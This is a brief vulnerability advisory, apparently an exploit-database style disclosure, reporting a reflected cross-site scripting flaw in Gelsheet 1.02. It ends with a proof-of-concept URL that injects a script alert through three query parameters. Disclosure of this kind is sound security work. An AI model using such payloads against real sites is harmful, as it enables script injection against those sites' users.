------------------------------------------------------------------------ Software................Gelsheet 1.02 Vulnerability...........Reflected Cross-site Scripting Threat Level............Low (1/5) Download................http://www.gelsheet.org/ Discovery Date..........5/5/2011 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ Email...................John Leitch ------------------------------------------------------------------------ --Description-- A reflected cross-site scripting vulnerability in Gelsheet 1.02 can be exploited to execute arbitrary JavaScript. --PoC-- http://localhost/fengoffice/public/assets/javascript/gelSheet/index.php?id=%3Cscript%3Ealert%280%29%3C/script%3E&wid=%3Cscript%3Ealert%280%29%3C/script%3E&book=%3Cscript%3Ealert%280%29%3C/script%3E